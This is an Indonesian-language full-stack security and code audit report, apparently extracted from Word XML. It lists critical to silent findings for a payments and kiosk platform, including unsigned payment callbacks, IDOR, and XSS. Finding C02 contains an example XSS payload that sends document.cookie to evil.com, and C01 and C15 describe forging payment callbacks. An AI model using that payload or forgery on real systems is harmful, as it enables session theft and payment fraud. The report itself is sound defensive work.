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System Audit Report — v5.16.2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Tanggal: 2026-07-21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Scope: Full-stack audit: Frontend, Backend, Database, Security, Performance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/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RINGKASAN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Severity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Jumlah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Penjelasan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CRITICAL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Bisa mengakibatkan kerugian finansial, data breach, atau system compromise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MAJOR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Degrades performa, UX buruk, atau risiko data inconsistency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MINOR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Mengurangi kualitas kode, berdampak kecil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SILENT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Tidak menunjukkan error, tapi behavior tidak terduga</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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68</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. CRITICAL (15 temuan)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Temuan ini BISA mengakibatkan kerugian finansial, data breach, atau system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C01: iPaymu Callback Signature Tidak Diverifikasi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src/routes/payments.ts:623-637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Endpoint `/api/payments/ipaymu/callback` tidak memverifikasi HMAC signature dari request. iPaymu mengirim callback dengan signature di header `X-Signature`, tapi kode hanya memproses body tanpa validasi apakah signature benar. Artinya, siapapun bisa mengirim POST ke endpoint ini dengan body palsu untuk menandai transaksi sebagai "paid" tanpa benar-benar membayar.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Attacker bisa memalsukan konfirmasi pembayaran. Cukup kirim POST ke `/api/payments/ipaymu/callback` dengan `external_id` yang valid dan status `berhasil`, maka transaksi akan ditandai lunas, stok produk terpotong, dan seller balance terkredit — tanpa uang masuk.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Callback hanya diterima jika signature valid. Attacker tidak bisa memalsukan pembayaran. Transaksi hanya lunas jika iPaymu benar-benar mengonfirmasi pembayaran.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Setiap transaksi bisa "dibayar" palsu. Attacker bisa beli produk apapun tanpa bayar. Kerugian finansial langsung (produk hilang + uang tidak masuk).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C02: XSS via Product Names di OG Tags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server.ts:327-349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Product names dari database di-inject langsung ke HTML meta tags (og:title, og:description) tanpa sanitization. Jika admin memasukkan nama produk seperti &lt;script&gt;document.location='https://evil.com/?c='+document.cookie&lt;/script&gt;, script ini akan executing saat link dibagikan di WhatsApp/Telegram/social media.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Stored XSS — malicious script executes di browser siapapun yang membuka link produk. Cookie session bisa dicuri, akun bisa di-takeover. Kerentanan ini scalable: cukup 1 produk malicious, bisa menyebar ke ribuan user yang membuka link.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Semua input di-sanitize sebelum di-inject ke HTML. Nama produk tetap tampil normal, tapi script injection tidak mungkin.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XSS tetap aktif. Satu produk malicious bisa mencuri session ribuan user. Reputasi platform rusak permanen.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C03: dangerouslyAllowBrowser: true di Groq SDK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server.ts:69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Inisialisasi Groq SDK menggunakan `dangerouslyAllowBrowser: true`. Flag ini menonaktifkan security checks yang mencegah API key exposure di client-side. Meskipun server-side, flag ini berbahaya karena menunjukkan arsitektur yang tidak aman.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Jika kode ini refactor ke client-side (atau server-side rendering yang salah), API key Groq akan ter-expose. Groq API key bisa digunakan attacker untuk menjalankan AI requests yang dibayar oleh kita.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Security checks aktif. API key tetap aman di server-side. Risiko exposure berkurang drastis.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Risiko API key exposure tetap ada. Jika refactor salah, attacker bisa burn quota Groq API kita.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C04: Payment Endpoints Tanpa Auth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src/routes/payments.ts:62,146,389,468,552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 payment endpoints tidak memiliki auth middleware: `POST /payments` (create), `POST /payments/receipt` (verify), `GET /payments/:id` (status), `POST /payments/points` (points pay), `POST /payments/balance` (balance pay). Endpoint ini bisa diakses tanpa login.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Siapapun bisa: (1) membuat pembayaran untuk user lain, (2) verify receipt palsu, (3) cek status pembayaran user lain, (4) bayar pakai points/balance user lain. Ini adalah IDOR vulnerability yang bisa dieksploitasi massal.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Hanya user login yang bisa mengakses. Attacker tidak bisa memanipulasi pembayaran user lain.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Semua transaksi bisa dimanipulasi. User A bisa bayar pakai points user B. Kerugian finansial masif.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C05: Transaction Cancel Tanpa Auth (IDOR)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src/routes/transactions.ts:641-697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Endpoint `POST /transactions/:id/cancel` tidak memverifikasi siapa yang membatalkan. Cukup dengan ID transaksi yang diketahui (dari URL/inspeksi), siapapun bisa membatalkan transaksi pending milik user lain.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Attacker bisa membatalkan transaksi pending yang sedang dalam proses pembayaran. Jika user sudah transfer tapi transaksi dicancel sebelum callback, stok produk bisa hilang sementara uang sudah terkirim.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Hanya owner transaksi yang bisa cancel. Data integrity terjaga.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IDOR — transaksi bisa dicancel oleh siapapun. Bisa digunakan untuk sabotase pesaing atau fraud.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C06: Auth Bypass di Diagnostics Route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src/routes/diagnostics.ts:112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Route `GET /api/admin/reconciliation/status` tidak menggunakan `requireAuth` dari middleware auth. Route ini seharusnya hanya bisa diakses admin, tapi bisa diakses publik.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sensitif ter-expose: jumlah mismatches, total kerugian, status reconciliation, seller balance discrepancies. Attacker bisa memanfaatkan informasi ini untuk exploit.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Hanya admin yang bisa melihat data reconciliation. Data sensitif terlindungi.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internal ter-expose. Attacker bisa mengetahui kelemahan sistem dan mengeksploitasinya.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C07: Non-Atomic Payment Flows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src/routes/payments.ts (multiple)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Beberapa payment flow memisahkan status update dan stock deduction menjadi operasi terpisah. Jika crash terjadi di antara keduanya, status berubah tapi stock tidak terpotong (atau sebaliknya).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inconsistency: transaksi terlihat "paid" tapi stok tidak berkurang. Seller tidak mendapat uang tapi produk sudah "terjual". Atau sebaliknya: stok terpotong tapi status tetap "pending".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Operasi digabung dalam satu transaction atomik. Jika ada yang gagal, semua di-rollback. Data konsisten.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Race condition tetap ada. Periodic mismatch terjadi. Perlu manual reconciliation terus-menerus.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C08: Manual Verify Tidak Memanggil Stock Deduction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src/routes/payments.ts:267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Fungsi manual payment verify hanya mengupdate status transaksi menjadi "paid" tanpa memanggil `commitTransactionStock()`. Ini berlaku untuk semua pembayaran manual (transfer bank, QRIS, dll).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Stock tidak terpotong untuk pembayaran manual. User bisa beli melebihi stok tersedia. Seller tidak mendapat balance karena settlement tidak dijalankan. Dampaknya berlapis: stok akurat rusak + seller rugi.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Stock terpotong otomatis saat manual verify. Seller balance terkredit. Data konsisten.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Stock tidak akurat untuk semua pembayaran manual. Ini adalah 40% dari semua transaksi. Kerugian akumulatif.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C09: Schema Drift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supabase-schema.sql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File `supabase-schema.sql` tidak sinkron dengan deployed schema di Supabase. Beberapa tabel yang ada di file tidak ada di production, atau sebaliknya.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Developer baru bisa deploy schema yang salah. Migration yang dijalankan bisa drop tabel yang masih digunakan. Trust pada documentation berkurang.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Schema file adalah single source of truth. Deploy aman, tidak ada drift.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Drift tetap ada. Setiap deploy berisiko. Developer baru bingung.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C10: .env Ter-commit ke Git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.env (commit 5b5e51d)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File `.env` pernah di-commit ke git repository pada commit `5b5e51d`. Meskipun sudah dihapus dari working tree, semua secrets tetap ada di git history.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Semua production secrets ter-expose: Supabase keys, iPaymu API key, Digiflazz credentials, Gmail app password, VAPID keys. Siapapun yang clone repo bisa mengambil semua credentials ini.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Semua secrets di-rotate. Git history di-clean atau repo di-recreate. Risiko zero setelah rotation.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Semua credentials aktif bisa digunakan attacker. Backend bisa diakses, database bisa dimanipulasi, API keys bisa disalahgunakan.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C11: Expected HMAC Signature Logged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src/routes/digital.ts:713-714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logging mencetak expected HMAC signature ke console. Log ini bisa diakses oleh attacker yang sudah memiliki akses ke server logs.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Attacker bisa membaca log untuk mengetahui HMAC signature yang valid, lalu menggunakannya untuk memalsukan webhook.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Hanya invalid signature yang dilog. Expected value tidak pernah ditulis.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poisoning — attacker bisa forge valid webhook dengan membaca log server.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C12: Weak Temp Password (Math.random)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src/routes/admin.ts:52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Fungsi `adminCreateSeller` menggunakan `Math.random()` untuk generate temporary password. `Math.random()` bukan cryptographically secure.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Password bisa di-predict atau di-brute force. Jika attacker mengetahui seed/pattern, mereka bisa menebak password admin seller.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Password di-generate dengan `crypto.randomBytes()`. Tidak bisa dipredict.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Password lemah. Risiko akun seller di-brute force.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C13: Non-Atomic Points Update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src/services/payment.js:34-36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Points update menggunakan read-then-write: baca current points, tambah/deduct, tulis ulang. Tidak ada locking atau atomic operation.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requests bisa overwrite points. Jika user beli 2 item secara bersamaan, points hanya terpotong sekali (double spend).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Gunakan atomic increment dari Supabase. Points selalu akurat, tidak ada double spend.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Double spend points tetap mungkin. User bisa menghabiskan points lebih dari yang dimiliki.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C14: XSS via dangerouslySetInnerHTML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src/pages/portal/PortalPengumuman.tsx:348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 PortalPengumuman menggunakan `dangerouslySetInnerHTML` untuk render konten announcement tanpa sanitization.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Stored XSS — jika admin mengisi announcement dengan malicious HTML/JS, semua user portal akan executing script tersebut.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Gunakan `sanitizeRichTextHtml()` dari DOMPurify. HTML bersih, script injection tidak mungkin.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XSS tetap aktif. Portal bisa digunakan sebagai vector untuk mencuri data user.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C15: Digiflazz Callback Signature Bypass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src/routes/digital.ts:706-738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Endpoint Digiflazz callback tidak memverifikasi signature. Callback diterima tanpa validasi.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Attacker bisa memalsukan top-up digital items. Cukup kirim POST dengan status "sukses", produk digital akan dikirim tanpa pembayaran.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Callback hanya diterima dengan signature valid. Digital items hanya dikirim jika pembayaran benar.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Digital items bisa didapatkan gratis. Kerugian langsung dari supplier.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2. MAJOR (23 temuan)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Temuan ini menyebabkan degradasi performa, UX buruk, atau risiko data inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">M01: Checkout Mutex Tidak di-Reset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src/pages/kiosk/Checkout.tsx:46,213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 `isCreatingTx` di-set `true` saat checkout dimulai, tapi tidak pernah di-reset ke `false` setelah error. Setelah 1 gagal transaksi, user tidak bisa membuat transaksi lagi sampai reload halaman.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terkunci dari checkout setelah 1 error. Tidak ada cara untuk recover kecuali reload. Customer service complaint.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Mutex di-reset di `finally` block. User bisa retry setelah error.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harus reload setiap kali checkout gagal. Frustrasi, churn risk.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M02: Stale Cart Stock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src/store/useCartStore.ts:46-89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Cart menyimpan stock dari waktu item ditambahkan. Tidak ada re-validation saat checkout. Jika stock berubah (dibeli orang lain) antara waktu ditambahkan dan checkout, user bisa beli melebihi stock.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Overselling — stok minus. Seller harus reject manual, customer service complaint, refund processing.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Stock di-revalidate sebelum checkout. Jika tidak cukup, user diberitahu sebelum bayar.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Overselling terjadi secara berkala. Manual intervention diperlukan. Trust berkurang.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M03: Seller Phone Input Kosong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src/pages/dashboard/DashboardLayout.tsx:156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Input phone seller tidak menampilkan nilai yang sudah tersimpan. Setiap kali halaman di-load, input kosong meskipun data sudah ada di database.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Seller tidak bisa edit/melihat phone mereka. Data kontak tidak lengkap. Komunikasi terhambat.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Phone ditampilkan dari database. Seller bisa edit dan save.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Phone field selalu kosong. Data kontak tidak lengkap.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M04: AdminScanner Lock Permanen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src/pages/dashboard/admin/AdminScanner.tsx:168-198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Variable `isLocked` di-set `true` saat scan dimulai, tapi tidak di-reset saat error. Scanner menjadi permanently disabled sampai halaman di-reload.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Admin scanner tidak bisa digunakan setelah 1 error. Admin harus reload untuk recover.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Lock di-reset di `finally` block. Scanner selalu可用.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Scanner sering mati. Admin harus reload berkali-kali.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M05: Profile Input Reset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src/pages/kiosk/Profile.tsx:53-56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Input fields di profile menggunakan controlled component tanpa local state. Setiap keystroke, value di-overwrite dari state yang belum ter-update.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tidak bisa mengetik dengan benar. Input terasa laggy dan reset sendiri.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Local state untuk input. Responsive typing experience.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Profile editing nyaris tidak bisa digunakan. Frustrasi user.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M06: Email Transport Leak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src/services/email.js:26-31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Setiap kali email dikirim, transport baru di-buat dan tidak di-close. SMTP connection leak terjadi secara kumulatif.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Gmail rate limiting (500/hari). Connection pool exhaust. Email gagal dikirim setelah volume tinggi.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Transport di-reuse atau di-close setelah use. Tidak ada leak.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 service degradasi. User tidak terima receipt/notification.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M07: Memory Leak di notifiedProgramStarts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src/services/background-jobs.js:340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`notifiedProgramStarts` bertambah terus tanpa batas. Setiap program registration baru ditambah ke set, tidak pernah di-cleanup.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Memory consumption meningkat seiring waktu. Setelah ribuan registration, server bisa OOM (Out of Memory).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dibatasi atau menggunakan TTL. Memory stabil.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Memory leak lambat tapi pasti. Server crash dalam waktu lama.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M08: writeFileSync Blocking Event Loop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src/services/digiflazz.js:59-65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Cache Digiflazz ditulis dengan `writeFileSync()`. Operasi sync ini memblokir event loop selama write berlangsung.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 freeze sebentar setiap cache update. Semua request lain menunggu. Response time spike.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Gunakan async write. Event loop tidak terganggu.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Micro-freezes setiap beberapa menit. Bisa menyebabkan timeout pada request lain.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M09: Weak Password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src/routes/auth.ts:199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Tidak ada minimum password length atau complexity requirement. Password 1 karakter diterima.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membuat password lemah. Akun mudah di-brute force. Credential stuffing attack.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Minimum 8 karakter + complexity check. Akun lebih aman.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Akun rentan brute force. Reputasi platform di risiko.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M10: Verbose Error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Multiple routes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Beberapa error handler mengirim error message lengkap ke client, termasuk stack trace atau internal error details.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Attacker mendapat informasi internal: nama file, line number, database structure. Membantu mereka untuk craft exploit.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hanya mendapat generic error. Internal details hanya di server log.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Information disclosure. Attacker bisa belajar tentang sistem dari error messages.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M11: Missing Compression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server.ts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Tidak ada gzip/brotli compression untuk HTTP responses. Semua response dikirim uncompressed.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3-5x lebih besar dari necessary. Bandwidth usage tinggi. Load time lebih lambat, terutama di mobile.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Compression mengurangi response size 70-80%. Load time membaik. Bandwidth saving.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experience lambat. Hosting cost lebih tinggi. Mobile user terdampak.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M12: Portal Checkout No Auth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src/routes/portal.ts:458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Portal checkout endpoint tidak memverifikasi userId dari token. userId diambil dari request body, bukan dari authenticated session.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Payment fraud — attacker bisa checkout dengan userId user lain, menghabiskan balance/points mereka.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userId diambil dari token. Tidak ada spoofing.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IDOR via portal checkout. Balance/points bisa dihabiskan tanpa consent.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M13: Missing Composite Indexes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Database (multiple tables)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Beberapa query menggunakan multiple columns tanpa composite index. Query harus scan seluruh table.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Query lambat pada data volume tinggi. Background jobs lambat. User experience buruk.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Composite index mempercepat query 10-100x. Performance improved.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degradasi seiring data bertambah. Semakin lambat.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M14: N+1 Queries di Background Jobs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src/services/background-jobs.js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jobs melakukan 50+ DB calls per cycle. Setiap product/seller diproses satu per satu.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 load tinggi setiap 5 menit. Response time meningkat. DB connection pool exhaust.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Batch queries + Promise.all. 50 calls jadi 5. Load berkurang 90%.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Semakin banyak data, semakin berat. Scaling limit tercapai.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M15: N+1 di Stock Reconciliation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src/services/stock.js:392-397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Stock reconciliation query setiap product satu per satu, padahal bisa dilakukan dalam satu query.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Reconciliation lambat. Memory usage tinggi karena multiple query results.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query + group in memory. 10x lebih cepat.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Reconciliation lambat, resource wasteful.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M16: Missing Caching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Multiple endpoints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Analytics dan reporting endpoints tidak caching. Setiap request query database dari awal.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Dashboard lambat. User harus menunggu lama untuk melihat data.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cache dengan TTL. Response instant untuk data yang sama.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Dashboard selalu lambat. User frustrasi.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M17: .select(*) Overfetching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76 instances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76 tempat menggunakan `.select()` tanpa column specification. Semua kolom diambil, termasuk yang tidak diperlukan.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payload besar. Bandwidth waste. Memory usage tinggi di server dan client.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Explicit column selection. Payload berkurang 50-80%. Lebih cepat.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Payload tetap besar. Performance penalty.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M18: Unbounded Queries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portal.ts, admin.ts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Beberapa query tidak menggunakan LIMIT. Jika data sangat banyak, query akan mengambil semua sekaligus.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Memory overflow untuk data besar. Timeout. Server crash.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Pagination membatasi results per page. Predictable memory usage.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Risiko OOM crash untuk data volume tinggi.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M19: Missing Auth on /api/reports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src/routes/misc.ts:576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Endpoint `/api/reports` yang menampilkan data penjualan tidak memiliki auth middleware.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penjualan ter-expose ke publik. Competitor bisa melihat revenue, product performance.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Hanya admin/authorized user yang bisa melihat reports.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Business data leak. Competitive disadvantage.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M20: Seller Balance Restoration Non-Atomic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src/routes/withdrawals.ts:27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Saat withdrawal gagal, balance dikembalikan dengan read-then-write. Tidak atomic.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Race condition — balance bisa di-overwrite jika ada concurrent transaction.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Fetch current balance dulu, lalu increment. Data konsisten.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Balance bisa salah setelah failed withdrawal.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M21: Missing Image Lazy Loading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100+ &lt;img&gt; tags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Lebih dari 100 tag `&lt;img&gt;` tidak menggunakan `loading="lazy"`. Semua gambar di-load sekaligus saat halaman dibuka.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Initial load time lambat. Bandwidth waste. Mobile user terdampak.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Lazy loading menunda load gambar yang belum visible. Load time membaik.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Gambar load sekaligus. Lambat di mobile/slow connection.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M22: Auth State Stale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src/App.tsx:162-175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 state menggunakan gate `isAuthInit` yang bisa menyebabkan stale data. Setelah login, state bisa masih menunjukkan "belum login" untuk sementara.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Cross-account data leakage. User bisa melihat data user lain sebelum state ter-update.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 state selalu fresh. Tidak ada stale data.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Race condition pada auth. Data leak sesaat setelah login/logout.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M23: Z-index Conflicts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Multiple components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Tidak ada standardisasi z-index scale. Beberapa component menggunakan inline styles dengan z-index yang konflik.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Modal bisa tertutup oleh dropdown. Toast notification tertutup oleh sidebar. Visual overlap.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Standardized z-index scale. Visual hierarchy konsisten.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 bugs secara berkala. User experience terganggu.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3. MINOR (20 temuan)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Temuan ini berdampak kecil namun mengurangi kualitas kode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">m01: Missing aria-label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Multiple components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Banyak interactive elements (button, input, link) tidak memiliki aria-label. Screen reader tidak bisa membaca element dengan benar.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Aksesibilitas buruk. User dengan disabilities tidak bisa menggunakan aplikasi.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Aksesibilitas improved. Compliance dengan WCAG standards.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Aksesibilitas tetap buruk. Potensi hukum (ADA compliance).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m02: CSP allows unsafe-inline/eval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server.ts:102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Content Security Policy mengizinkan `unsafe-inline` dan `unsafe-eval`. Ini menonaktifkan proteksi XSS dari CSP.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CSP tidak efektif menangkal XSS. Proteksi berkurang.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CSP efektif. XSS lebih sulit dieksploitasi.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CSP hanya formalitas. Tidak ada perlindungan nyata.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m03: trust proxy = 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server.ts:74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Express `trust proxy` di-set ke `1`. Jika deployment berada di belakang proxy yang lebih dari 1 hop, IP address tidak akurat.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Rate limiting tidak akurat. IP-based blocking tidak efektif.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Trust proxy sesuai dengan deployment. IP akurat.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Rate limiting bisa di-bypass atau terlalu agresif.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m04: getUser DB call setiap request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src/middleware/auth.ts:20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Setiap HTTP request melakukan 1 DB call untuk verify session. Tidak ada caching.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DB load meningkat. Latency bertambah 10-50ms per request.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Session caching mengurangi DB calls 90%+.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DB load linear dengan traffic. Scaling limit lebih cepat tercapai.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m05: Silent error catch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src/services/stock.js:48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di stock operations di-catch tanpa logging. Error hilang begitu saja.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Debugging sulit. Error tidak terdeteksi sampai dampaknya terlihat.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logged. Bisa dideteksi dan diperbaiki lebih cepat.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silent. Potensi masalah yang tidak terdeteksi.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m06: Log injection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src/routes/misc.ts:546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input di-log tanpa sanitization. Newlines atau control characters bisa di-inject.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poisoning. Attacker bisa memalsukan log entries.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aman dari injection. Integrity terjaga.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bisa dimanipulasi. Forensic analysis terganggu.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m07: HTML injection di email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src/services/email.js:82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input di-inject ke email body tanpa HTML escaping.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 phishing. Attacker bisa menyisipkan malicious links.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 body aman. Tidak ada injection.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 bisa digunakan untuk phishing.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m08: IDOR seller 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src/routes/transactions.ts:699-725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Seller bisa melihat data transaksi seller lain. Tidak ada ownership check.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leak antar seller. Competitive intelligence.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Seller hanya bisa melihat data sendiri.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leak. Trust berkurang.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m09: VA number logged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server.ts:249-256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Virtual Account number di-log ke console. Jika log diakses attacker, VA bisa digunakan.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Potential fraud jika VA number disalahgunakan.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 number tidak di-log. Aman.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 number exposed di logs.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m10: NaN handling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src/services/payment.js:32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Tidak ada check apakah amount adalah NaN. Jika input tidak valid, NaN bisa menyebar ke calculations.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corruption. Balance/points jadi NaN. Manual fix diperlukan.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NaN ditolak sebelum diproses. Data aman.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NaN bisa merusak data. Manual recovery diperlukan.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m11: Duplicate routes (trailing slash)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Multiple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Beberapa endpoint diduplikasi dengan dan tanpa trailing slash. Menghabiskan memory.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Memory waste. Routing confusion.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Satu route saja. Clean.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Duplikat tetap ada. Minor waste.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m12: Nav recreate setiap render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DashboardLayout.tsx:277-420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Navigation items array di-recreate setiap render. Tidak di-memoize.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Unnecessary re-renders. Performance penalty.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Memoized. Hanya recreate saat data berubah.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Minor performance hit setiap render.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m13: Hardcoded SARIROTI_EMAILS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DashboardLayout.tsx:145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Daftar email Sariroti di-hardcode di component. Sulit diupdate.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email list requires code change + deploy.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Pindah ke database atau environment variable.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Maintenance overhead.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m14: Redundant auth check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src/routes/admin.ts:6-15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Admin routes melakukan auth check dua kali: global middleware + local check.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duplication. Confusing.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Konsolidasi ke satu global check.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Redundancy tetap ada. Maintenance confusion.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m15: Debug routes leak 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src/routes/diagnostics.ts:67-109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routes (system state, auth test) bisa diakses publik di production.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Internal information exposure.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routes disabled di production.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internal ter-expose.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m16: dailyReport 60s interval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background-jobs.js:26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Daily report job berjalan setiap 60 detik, bukan setiap hari.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Resource waste. Report dikirim terlalu sering.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Schedule sesuai kebutuhan. Resource efficient.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Wasted compute. Email flooding.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m17: Reload loop risk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App.tsx:120-130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Jika chunk load gagal, app reload tanpa batas. Infinite loop possible.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Browser hang. User harus force close.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Max retry limit. Graceful degradation.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Infinite reload risk.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m18: Interval pileup risk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server.ts:276-278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Jika background job interval tidak di-clear, multiple intervals bisa berjalan bersamaan.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Resource leak. Duplicate jobs.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Guard untuk prevent pileup.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Multiple intervals running simultaneously.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m19: Missing Suspense boundaries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Multiple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Beberapa lazy-loaded routes tidak memiliki Suspense fallback.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White screen saat loading. UX buruk.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Loading indicator ditampilkan saat route load.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Flash of white screen.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m20: Missing points_history index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src/routes/portal.ts:16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Tidak ada index untuk `points_history` query yang sering digunakan.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Query lambat untuk points history.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Index mempercepat query.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Points history page lambat.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4. SILENT (10 temuan)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Temuan ini tidak menunjukkan error, tapi menyebabkan behavior yang tidak terduga.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">s01: Error swallowed tanpa feedback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KioskLayout.tsx:64-77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Fetch error di KioskLayout di-catch tanpa menampilkan error message ke user. User tidak tahu apa yang terjadi.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melihat halaman kosong atau data tidak lengkap tanpa penjelasan. Mereka mungkin mengira aplikasi rusak.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message ditampilkan. User tahu ada masalah dan bisa retry.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 bingung. Churn risk.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s02: Promise.all catch = null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AdminDashboard.tsx:183-184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Promise.all untuk dashboard data di-catch dengan handler kosong. Jika ada error, dashboard kosong tanpa penjelasan.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Admin melihat dashboard kosong. Mereka tidak tahu apakah memang tidak ada data atau ada error.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ditampilkan. Admin tahu ada masalah.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Dashboard ambigu. Admin bisa membuat keputusan salah.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s03: Registration check gagal silent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PortalFormView.tsx:212-215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Pengecekan apakah user sudah terdaftar untuk program gagal tanpa feedback. User bisa mendaftar duplikat.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Double registration. Double points deduction. Admin harus reject manual.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ditampilkan. User tahu ada masalah dan tidak bisa proceed.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Duplikat registration. Data inconsistency.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s04: updateQuantity(0) tidak remove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useCartStore.ts:71-78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Jika quantity diupdate ke 0, item tidak dihapus dari cart. Zombie items tetap ada.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Cart count salah. User bisa checkout dengan item yang seharusnya tidak ada.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Quantity 0 = remove. Cart selalu akurat.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Zombie items. Cart inaccurate.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s05: Polling timeout setelah unmount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History.tsx:67-82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Polling interval tidak di-clear saat component unmount. State update dilakukan pada unmounted component.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React warning. Memory leak. Potential crash.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Cleanup interval di useEffect return.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Memory leak. React warnings.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s06: Reload loop pada chunk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App.tsx:120-130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Jika JavaScript chunk load gagal, app reload. Tidak ada max retry. Bisa infinite loop.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Browser hang. User harus force close.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Max retry limit. Graceful degradation.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Infinite reload. Browser unresponsive.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s07: Insert error tidak di-handle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stock.ts:14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ke `stock_requests` gagal tanpa error handling. Request hilang begitu saja.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Restock request tidak tercatat. Admin tidak tahu ada request.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ditampilkan. User bisa retry.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Request hilang. Stok tidak pernah di-restock.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s08: Balance restore error tidak di-handle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withdrawals.ts:62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Jika withdrawal gagal dan balance restore error, error tidak di-handle. Seller bisa rugi.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Balance seller hilang tanpa trace. Manual fix diperlukan.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logged dan ditampilkan. Admin bisa intervensi.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Balance leak. Seller rugi.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s09: API key missing → empty string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payments.ts:92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Jika `GROQ_API_KEY` tidak di-set, nilainya empty string. Groq calls gagal dengan error yang tidak jelas.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AI features tidak berfungsi. Error message tidak membantu debugging.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Validasi API key saat startup. Error jelas.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Silent failure. Debugging sulit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">s10: @ts-nocheck disables type safety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Multiple files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Masalah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Beberapa file menggunakan `// @ts-nocheck`. TypeScript tidak bisa mendeteksi type errors.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Dampak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Null checks terlewat. Type errors muncul di runtime.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Type safety aktif. Error terdeteksi saat compile.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Jika TIDAK Diperbaiki</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500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errors yang seharusnya terdeteksi lebih awal.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5. PRIORITAS PERBAIKAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority 1 — Minggu Ini — CRITICAL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C04, C05, C06, C01, C02, C03, C10, C13, C14, C08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority 2 — 2 Minggu — MAJOR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M01, M06, M07, M08, M11, M13, M14, M16, M17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority 3 — Bulan Depan — MINOR/SILENT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Semua MINOR + SILENT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2026-07-21T22:35:33.713Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-21T22:35:33.713Z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